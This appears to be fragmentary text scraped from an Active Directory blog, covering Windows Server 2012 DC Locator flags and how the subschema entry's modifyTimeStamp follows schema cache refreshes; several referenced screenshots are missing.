Windows Server 2008 SP2: Lsass.exe process crashes and error code 255 is logged because of a CNF NTDS Settings object in Active Directory on Windows http://support.microsoft.com/kb/2913087/en-US
The DC Locator flags to specify the requirements of a Windows Server 2012 DC or a Windows Server 2012 R2 DC using the DsGetDCName API are as following:
Table 1: Windows Server 2012 DC Locator flags
Name
DS_DIRECTORY_SERVICE_8_REQUIRED (0x200000)
Requires that the returned domain controller be running Windows Server 2012 or later.
DS_DIRECTORY_SERVICE_9_REQUIRED (0x400000)
Requires that the returned domain controller be running Windows Server 2012 R2 or later.
The exception is the DMD or the SubSchemaSubEntry “CN=Aggregate,CN=Schema,CN=Configuration,DC=X“
Let’s have a look with LDP.exe:
So this clearly shows that ‘modifyTimeStamp’ is NOT based on the ‘whenChanged’ attribute for the subSchemaEntry.
How it really works
Let’s agree we have confirmed that, so to the next question, what is it based on? Well it’s based on the last time the in-memory schema cache of the particular DC was updated either during boot or by manually triggering the operational attribute “SchemaUpdateNow:1”
So let’s try that?
So let’s have a look again:
Yes – “modifyTimeStamp” now shows todays date: 2013-06-28 instead of previously 2013-06-21 J
Why it was implemented
So I guess now there is really one good question left, why?
The answer can be found if you read up on RFC 2251 that says:
“modifyTimestamp: the time this entry was last modified” – you can read further on MSDN where you can see what functionality defined in RFC 2551 Active Directory has implemented: http://msdn.microsoft.com/en-us/library/cc223231.aspx
It’s late and I’ve just gone thru the “Windows Server 2012 R2 Preview” schema aka “Schema 69” and it seems like it first introduces an attribute to the schema that it later on in the process will defunct.